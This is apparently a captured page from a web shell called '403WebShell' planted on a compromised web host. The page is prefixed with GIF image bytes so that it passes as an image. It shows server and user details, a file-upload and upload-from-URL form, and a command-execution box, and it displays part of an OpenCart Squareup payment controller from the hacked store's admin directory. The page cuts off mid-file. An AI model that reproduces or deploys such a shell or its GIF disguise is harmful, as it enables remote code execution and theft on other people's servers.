GIF89a=
( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ                                                                           !ù

 ' !ÿ
NETSCAPE2.0
   ,    =
(  þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE
¯°
¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ
|¥ÂÙ­&ºìE8œ¹kGÔAÞpx­a¶­ãR2XB®åE
8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ Â
4#ZÔ‰O|-4Bs‘X:=
QÉ œš lºÒyXJŠGȦ|s
hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ
¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5
½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ
 l5‘Ž¯pß´
˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½	‘Ý{ó)vmÞü%D~6f s}ŃƒDØW Eþ`‡þ	À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`}	lď’ÄÉ@4>ñd
œ à‘vÒxNÃ×™@žd=ˆgsžG±æ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH]
†¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ	».Û¬¯
t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°
Ÿð0Ä_ 
½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p%
AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À×
 ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ö×Þ^`8EÜ]
ý.뜃Âç 7 ú ȉÞj œ½Dç 
zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼	&A
¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂ
xŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`AÚ/NE€Ø†À9‚@¤à	H½7”à‡%B‰`À
l*ƒó‘–
‡8 2ñ%¸ —€:Ù1Á‰E¸àux%
nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û
°b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@%òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐQTÂ
o‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3	ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚  !ù

 " ,    =
( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ                                                                                          þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g
 «¬ E 
±±
¨­¶°ººE
Á´”·®C¬²
§Ç¶
Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ	l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ»
K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M	'¡¨2¸*Ÿþ>#nâ†
å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤
×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N
E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦
‚ ŽkÛTÇDpE@WÜ	²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰
 h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8  #VÇá <Fù–C™Ä^F9Ä #­ÉRAGb©d“(0$kêè‘ž¨'L¢)B]æù¨eŠ>‘å–ÄV„œ|Šè•m"сœn|@
›U¶ÆΞ—Špb¥G¨ED”€±Úê2FÌIç?
>Éxå
α
¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë
QÀÉSÌÂÇ2ÌXÀ{æk²
lQÁ2«ÊðÀ¯w|2Íh‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ	q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ
üôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶	0QwG#¯
æš[^Äþ	$ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ì<O»í!‹œ{÷E ÿ{ðVðÚú×Cß{òËgo„óõú’'߁zEHÔrJÅ=˜5€Ýé²¥ºá¹î4Â÷ˆÐ´V	w ƒß$xVA.¬+üä'ÊE„E ^ž‡©£•84`K—>L¹„®£œŠ‚à0œ]PÁ^p	F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-
žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q	q”
‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/
&.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ	¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—!	¦t)K%tœ-¦JF
bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ	‰   !ù

 ) ,    =
( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ                                                                     þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª«

E$±²¨ª­
·
°²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ EééH½MÛÂGâªD­çBêêϾD²ÒaÀà€Š1r­ðÓ¤	ÔožzU!L˜C'¾yW½UGtäÇïÙllê
0×àÂuGþ)AÀs[þ·xì
ÁxO%ƒûX2ó—

P£n›R/¡ÑšHše+êDm?#—‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°-
<‡
*´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü
wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á
 ~Öº“®›¸ÏMDfJÙ
°„
ÛµáWõ%§œ‚à©–‚X Ó؁)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d€CÁW)HÜcC$€L 
Ä7„r.á\{)@ð` @	äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦
P
…d’ä¡“¦ðÎTƒ¦ià|À
 _

¥ Qi#¦Šg›Æ ›noMµ
›V
ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, 
\jÛ´›6±¬¶C
ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥
²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëêÂ
7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*
3)O‘˜Ö[_hv
,àî×EtŸé¶BH€Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g›
êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºí
ï{ËC Ú—"”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»]	A#ð «€¿šéz)
Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa
¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oŠ°^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ®
©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF
Í[¤+‹ðɈ-áwj¨¥þ8¾rá
,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK“¦Ç#
âDÂ:ûc?:R	Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW	,
ˆ”8(T™P‰F¡Jhç"‚  ;<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>172.67.177.218</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.195</font><br>Web Server : <font color='#df5'>LiteSpeed</font><br>System : <font color='#df5'>Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64</font><br>User : <font color='#df5'>akhalid&nbsp;</font>( <font color='#df5'>749</font>)<br>PHP Version : <font color='#df5'>8.3.22</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/home">home</a>/<a href="?loknya=/home/akhalid">akhalid</a>/<a href="?loknya=/home/akhalid/omerys">omerys</a>/<a href="?loknya=/home/akhalid/omerys/public_html">public_html</a>/<a href="?loknya=/home/akhalid/omerys/public_html/admin">admin</a>/<a href="?loknya=/home/akhalid/omerys/public_html/admin/controller">controller</a>/<a href="?loknya=/home/akhalid/omerys/public_html/admin/controller/extension">extension</a>/<a href="?loknya=/home/akhalid/omerys/public_html/admin/controller/extension/payment">payment</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='green'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/228ef4/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /home/akhalid/omerys/public_html/admin/controller/extension/payment/squareup.php</tr></td></table><br/><pre>&lt;?php

class ControllerExtensionPaymentSquareup extends Controller {
    private $error = array();

    public function index() {
        $this-&gt;load-&gt;language(&#039;extension/payment/squareup&#039;);

        $this-&gt;load-&gt;model(&#039;extension/payment/squareup&#039;);
        $this-&gt;load-&gt;model(&#039;setting/setting&#039;);

        $this-&gt;load-&gt;library(&#039;squareup&#039;);

        if ($this-&gt;request-&gt;server[&#039;HTTPS&#039;]) {
            $server = HTTPS_SERVER;
        } else {
            $server = HTTP_SERVER;
        }

        $previous_setting = $this-&gt;model_setting_setting-&gt;getSetting(&#039;payment_squareup&#039;);

        try {
            if ($this-&gt;config-&gt;get(&#039;payment_squareup_access_token&#039;)) {
                if (!$this-&gt;squareup-&gt;verifyToken($this-&gt;config-&gt;get(&#039;payment_squareup_access_token&#039;))) {
                    unset($previous_setting[&#039;payment_squareup_merchant_id&#039;]);
                    unset($previous_setting[&#039;payment_squareup_merchant_name&#039;]);
                    unset($previous_setting[&#039;payment_squareup_access_token&#039;]);
                    unset($previous_setting[&#039;payment_squareup_access_token_expires&#039;]);
                    unset($previous_setting[&#039;payment_squareup_locations&#039;]);
                    unset($previous_setting[&#039;payment_squareup_sandbox_locations&#039;]);

                    $this-&gt;config-&gt;set(&#039;payment_squareup_merchant_id&#039;, null);
                } else {
                    if (!$this-&gt;config-&gt;get(&#039;payment_squareup_locations&#039;)) {
                        $previous_setting[&#039;payment_squareup_locations&#039;] = $this-&gt;squareup-&gt;fetchLocations($this-&gt;config-&gt;get(&#039;payment_squareup_access_token&#039;), $first_location_id);
                        $previous_setting[&#039;payment_squareup_location_id&#039;] = $first_location_id;
                    }
                }
            }

            if (!$this-&gt;config-&gt;get(&#039;payment_squareup_sandbox_locations&#039;) &amp;&amp; $this-&gt;config-&gt;get(&#039;payment_squareup_sandbox_token&#039;)) {
                $previous_setting[&#039;payment_squareup_sandbox_locations&#039;] = $this-&gt;squareup-&gt;fetchLocations($this-&gt;config-&gt;get(&#039;payment_squareup_sandbox_token&#039;), $first_location_id);
                $previous_setting[&#039;payment_squareup_sandbox_location_id&#039;] = $first_location_id;
            }

            $this-&gt;model_setting_setting-&gt;editSetting(&#039;payment_squareup&#039;, $previous_setting);
        } catch (\Squareup\Exception $e) {
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;text_location_error&#039;), $e-&gt;getMessage())
            ));
        }

        $previous_config = new Config();

        foreach ($previous_setting as $key =&gt; $value) {
            $previous_config-&gt;set($key, $value);
        }        

        if ($this-&gt;request-&gt;server[&#039;REQUEST_METHOD&#039;] == &#039;POST&#039; &amp;&amp; $this-&gt;validate()) {
            $this-&gt;model_setting_setting-&gt;editSetting(&#039;payment_squareup&#039;, array_merge($previous_setting, $this-&gt;request-&gt;post));

            $this-&gt;session-&gt;data[&#039;success&#039;] = $this-&gt;language-&gt;get(&#039;text_success&#039;);

            if (isset($this-&gt;request-&gt;get[&#039;save_and_auth&#039;])) {
                $this-&gt;response-&gt;redirect($this-&gt;squareup-&gt;authLink($this-&gt;request-&gt;post[&#039;payment_squareup_client_id&#039;]));
            } else {
                $this-&gt;response-&gt;redirect($this-&gt;url-&gt;link(&#039;marketplace/extension&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;type=payment&#039;, true));
            }
        }

        $this-&gt;document-&gt;setTitle($this-&gt;language-&gt;get(&#039;heading_title&#039;));

        $data[&#039;error_status&#039;]                       = $this-&gt;getValidationError(&#039;status&#039;);
        $data[&#039;error_display_name&#039;]                 = $this-&gt;getValidationError(&#039;display_name&#039;);
        $data[&#039;error_client_id&#039;]                    = $this-&gt;getValidationError(&#039;client_id&#039;);
        $data[&#039;error_client_secret&#039;]                = $this-&gt;getValidationError(&#039;client_secret&#039;);
        $data[&#039;error_delay_capture&#039;]                = $this-&gt;getValidationError(&#039;delay_capture&#039;);
        $data[&#039;error_sandbox_client_id&#039;]            = $this-&gt;getValidationError(&#039;sandbox_client_id&#039;);
        $data[&#039;error_sandbox_token&#039;]                = $this-&gt;getValidationError(&#039;sandbox_token&#039;);
        $data[&#039;error_location&#039;]                     = $this-&gt;getValidationError(&#039;location&#039;);
        $data[&#039;error_cron_email&#039;]                   = $this-&gt;getValidationError(&#039;cron_email&#039;);
        $data[&#039;error_cron_acknowledge&#039;]             = $this-&gt;getValidationError(&#039;cron_acknowledge&#039;);

        $data[&#039;payment_squareup_status&#039;]                    = $this-&gt;getSettingValue(&#039;payment_squareup_status&#039;);
        $data[&#039;payment_squareup_status_authorized&#039;]         = $this-&gt;getSettingValue(&#039;payment_squareup_status_authorized&#039;);
        $data[&#039;payment_squareup_status_captured&#039;]           = $this-&gt;getSettingValue(&#039;payment_squareup_status_captured&#039;);
        $data[&#039;payment_squareup_status_voided&#039;]             = $this-&gt;getSettingValue(&#039;payment_squareup_status_voided&#039;);
        $data[&#039;payment_squareup_status_failed&#039;]             = $this-&gt;getSettingValue(&#039;payment_squareup_status_failed&#039;);
        $data[&#039;payment_squareup_display_name&#039;]              = $this-&gt;getSettingValue(&#039;payment_squareup_display_name&#039;);
        $data[&#039;payment_squareup_client_id&#039;]                 = $this-&gt;getSettingValue(&#039;payment_squareup_client_id&#039;);
        $data[&#039;payment_squareup_client_secret&#039;]             = $this-&gt;getSettingValue(&#039;payment_squareup_client_secret&#039;);
        $data[&#039;payment_squareup_enable_sandbox&#039;]            = $this-&gt;getSettingValue(&#039;payment_squareup_enable_sandbox&#039;);
        $data[&#039;payment_squareup_debug&#039;]                     = $this-&gt;getSettingValue(&#039;payment_squareup_debug&#039;);
        $data[&#039;payment_squareup_sort_order&#039;]                = $this-&gt;getSettingValue(&#039;payment_squareup_sort_order&#039;);
        $data[&#039;payment_squareup_total&#039;]                     = $this-&gt;getSettingValue(&#039;payment_squareup_total&#039;);
        $data[&#039;payment_squareup_geo_zone_id&#039;]               = $this-&gt;getSettingValue(&#039;payment_squareup_geo_zone_id&#039;);
        $data[&#039;payment_squareup_sandbox_client_id&#039;]         = $this-&gt;getSettingValue(&#039;payment_squareup_sandbox_client_id&#039;);
        $data[&#039;payment_squareup_sandbox_token&#039;]             = $this-&gt;getSettingValue(&#039;payment_squareup_sandbox_token&#039;);
        $data[&#039;payment_squareup_locations&#039;]                 = $this-&gt;getSettingValue(&#039;payment_squareup_locations&#039;, $previous_config-&gt;get(&#039;payment_squareup_locations&#039;));
        $data[&#039;payment_squareup_location_id&#039;]               = $this-&gt;getSettingValue(&#039;payment_squareup_location_id&#039;);
        $data[&#039;payment_squareup_sandbox_locations&#039;]         = $this-&gt;getSettingValue(&#039;payment_squareup_sandbox_locations&#039;, $previous_config-&gt;get(&#039;payment_squareup_sandbox_locations&#039;));
        $data[&#039;payment_squareup_sandbox_location_id&#039;]       = $this-&gt;getSettingValue(&#039;payment_squareup_sandbox_location_id&#039;);
        $data[&#039;payment_squareup_delay_capture&#039;]             = $this-&gt;getSettingValue(&#039;payment_squareup_delay_capture&#039;);
        $data[&#039;payment_squareup_recurring_status&#039;]          = $this-&gt;getSettingValue(&#039;payment_squareup_recurring_status&#039;);
        $data[&#039;payment_squareup_cron_email_status&#039;]         = $this-&gt;getSettingValue(&#039;payment_squareup_cron_email_status&#039;);
        $data[&#039;payment_squareup_cron_email&#039;]                = $this-&gt;getSettingValue(&#039;payment_squareup_cron_email&#039;, $this-&gt;config-&gt;get(&#039;config_email&#039;));
        $data[&#039;payment_squareup_cron_token&#039;]                = $this-&gt;getSettingValue(&#039;payment_squareup_cron_token&#039;);
        $data[&#039;payment_squareup_cron_acknowledge&#039;]          = $this-&gt;getSettingValue(&#039;payment_squareup_cron_acknowledge&#039;, null, true);
        $data[&#039;payment_squareup_notify_recurring_success&#039;]  = $this-&gt;getSettingValue(&#039;payment_squareup_notify_recurring_success&#039;);
        $data[&#039;payment_squareup_notify_recurring_fail&#039;]     = $this-&gt;getSettingValue(&#039;payment_squareup_notify_recurring_fail&#039;);
        $data[&#039;payment_squareup_merchant_id&#039;]               = $this-&gt;getSettingValue(&#039;payment_squareup_merchant_id&#039;, $previous_config-&gt;get(&#039;payment_squareup_merchant_id&#039;));
        $data[&#039;payment_squareup_merchant_name&#039;]             = $this-&gt;getSettingValue(&#039;payment_squareup_merchant_name&#039;, $previous_config-&gt;get(&#039;payment_squareup_merchant_name&#039;));

        if ($previous_config-&gt;get(&#039;payment_squareup_access_token&#039;) &amp;&amp; $previous_config-&gt;get(&#039;payment_squareup_access_token_expires&#039;)) {
            $expiration_time = date_create_from_format(&#039;Y-m-d\TH:i:s\Z&#039;, $previous_config-&gt;get(&#039;payment_squareup_access_token_expires&#039;));
            $now = date_create();

            $delta = $expiration_time-&gt;getTimestamp() - $now-&gt;getTimestamp();
            $expiration_date_formatted = $expiration_time-&gt;format(&#039;l, F jS, Y h:i:s A, e&#039;);

            if ($delta &lt; 0) {
                $this-&gt;pushAlert(array(
                    &#039;type&#039; =&gt; &#039;danger&#039;,
                    &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                    &#039;text&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;text_token_expired&#039;), $this-&gt;url-&gt;link(&#039;extension/payment/squareup/refresh_token&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true))
                ));
            } else if ($delta &lt; (5 * 24 * 60 * 60)) { // token is valid, just about to expire
                $this-&gt;pushAlert(array(
                    &#039;type&#039; =&gt; &#039;warning&#039;,
                    &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                    &#039;text&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;text_token_expiry_warning&#039;), $expiration_date_formatted, $this-&gt;url-&gt;link(&#039;extension/payment/squareup/refresh_token&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true))
                ));
            }

            $data[&#039;access_token_expires_time&#039;] = $expiration_date_formatted;
        } else if ($previous_config-&gt;get(&#039;payment_squareup_client_id&#039;)) {
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;text_token_revoked&#039;), $this-&gt;squareup-&gt;authLink($previous_config-&gt;get(&#039;payment_squareup_client_id&#039;)))
            ));

            $data[&#039;access_token_expires_time&#039;] = $this-&gt;language-&gt;get(&#039;text_na&#039;);
        }

        if ($previous_config-&gt;get(&#039;payment_squareup_client_id&#039;)) {
            $data[&#039;payment_squareup_auth_link&#039;] = $this-&gt;squareup-&gt;authLink($previous_config-&gt;get(&#039;payment_squareup_client_id&#039;));
        } else {
            $data[&#039;payment_squareup_auth_link&#039;] = null;
        }

        $data[&#039;payment_squareup_redirect_uri&#039;] = str_replace(&#039;&amp;amp;&#039;, &#039;&amp;&#039;, $this-&gt;url-&gt;link(&#039;extension/payment/squareup/oauth_callback&#039;, &#039;&#039;, true));
        $data[&#039;payment_squareup_refresh_link&#039;] = $this-&gt;url-&gt;link(&#039;extension/payment/squareup/refresh_token&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true);

        if ($this-&gt;config-&gt;get(&#039;payment_squareup_enable_sandbox&#039;)) {
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;warning&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;text_sandbox_enabled&#039;)
            ));
        }

        if (isset($this-&gt;error[&#039;warning&#039;])) {
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; $this-&gt;error[&#039;warning&#039;]
            ));
        }

        // Insert success message from the session
        if (isset($this-&gt;session-&gt;data[&#039;success&#039;])) {
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;success&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; $this-&gt;session-&gt;data[&#039;success&#039;]
            ));

            unset($this-&gt;session-&gt;data[&#039;success&#039;]);
        }

        if ($this-&gt;request-&gt;server[&#039;HTTPS&#039;]) {
            // Push the SSL reminder alert
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;info&#039;,
                &#039;icon&#039; =&gt; &#039;lock&#039;,
                &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;text_notification_ssl&#039;)
            ));
        } else {
            // Push the SSL reminder alert
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;error_no_ssl&#039;)
            ));
        }

        $tabs = array(
            &#039;tab-transaction&#039;,
            &#039;tab-setting&#039;,
            &#039;tab-recurring&#039;,
            &#039;tab-cron&#039;
        );

        if (isset($this-&gt;request-&gt;get[&#039;tab&#039;]) &amp;&amp; in_array($this-&gt;request-&gt;get[&#039;tab&#039;], $tabs)) {
            $data[&#039;tab&#039;] = $this-&gt;request-&gt;get[&#039;tab&#039;];
        } else if (isset($this-&gt;error[&#039;cron_email&#039;]) || isset($this-&gt;error[&#039;cron_acknowledge&#039;])) {
            $data[&#039;tab&#039;] = &#039;tab-cron&#039;;
        } else if ($this-&gt;error) {
            $data[&#039;tab&#039;] = &#039;tab-setting&#039;;
        } else {
            $data[&#039;tab&#039;] = $tabs[1];
        }

        $data[&#039;breadcrumbs&#039;] = array();

        $data[&#039;breadcrumbs&#039;][] = array(
            &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;text_home&#039;),
            &#039;href&#039; =&gt; $this-&gt;url-&gt;link(&#039;common/dashboard&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true)
        );

        $data[&#039;breadcrumbs&#039;][] = array(
            &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;text_extension&#039;),
